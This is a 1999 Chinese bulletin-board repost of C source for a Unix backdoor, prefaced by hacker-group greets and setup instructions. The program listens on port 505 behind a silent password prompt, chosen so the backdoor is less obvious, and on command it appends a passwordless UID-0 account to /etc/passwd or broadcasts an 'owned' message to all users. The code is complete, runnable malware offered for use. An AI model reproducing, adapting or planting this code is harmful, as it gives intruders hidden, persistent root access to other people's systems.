发信人: coolinger()
整理人: williamlong(1999-11-23 19:45:19), 站内信件
|
/*
A rip off a sockets tutorial i found somewhere cause I didn't feel lik
e
writing stupid basic sockets code when I had it in my src directory
already.
*/
/* Greets:
Undernet Channels:
#rootworm, #hacktech, #hyperlink, #3xposure, #legionoot
Groups:
The LegionOOT (www.legionoot.cc), Team Sploit
People:
Cyph3r, n3m0, Adoni, f0bic, d0g, khe0ps, h-S-t,
F-o-X, NeonMatrix, Azmodan, & Venomous
/*
Usage (setup):
# gcc -o backdoor backdoor.c
# ./backdoor password &
Usage (using):
telnet to host (port 505) --> type the password (don't wait for a
prompt, there isn't one so its less obvious its a backdoor) -->
type 1or 2. And yes it's _supposed_ to disconnect you after
each command.
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/wait.h>
#define PORT 505
#define MAXDATASIZE 100
#define BACKLOG 10
void handle(char *command);
int main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes;
char *bytes;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
char buf[MAXDATASIZE];
char ask[]="Enter Command (1 to put r00t::0:0:... in /etc/passwd, 2 to
send '7h1s b0x 1s 0wn3d' to all people on the box: ";
if (argc != 2) {
fprintf(stderr,"Usage: %s password\n", argv[0]);
exit(1);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)
) == -1)
{
perror("bind");
exit(1);
}
if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
exit(1);
}
while(1) { /* main accept() loop */
sin_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr, \
&sin_size)) ==
-1) {
perror("accept");
continue;
}
inet_ntoa(their_addr.sin_addr);
if (!fork()) {
recv(new_fd, buf,
MAXDATASIZE, 0);
bytes = strstr(buf, argv[1]);
if (bytes != NULL){
send(new_fd, ask, sizeof(ask), 0);
numbytes=recv(new_fd, buf,
MAXDATASIZE, 0);
buf[numbytes] = '\0';
handle(buf);
}
close(new_fd);
exit(0);
}
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* clean up child
processes */
}
}
void handle(char *command)
{
FILE *fle;
if(strstr(command, "1") != NULL)
{
fle = fopen("/etc/passwd", "a+");
fprintf(fle, "r00t::0:0:r00t:/root:/bin/bash");
fclose(fle);
}
if(strstr(command, "2") != NULL)
{
system("wall 7h1s b0x 1s 0wn3d");
}
}
英文比较简单请自己看吧
--
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 202.102.89.124]
|
|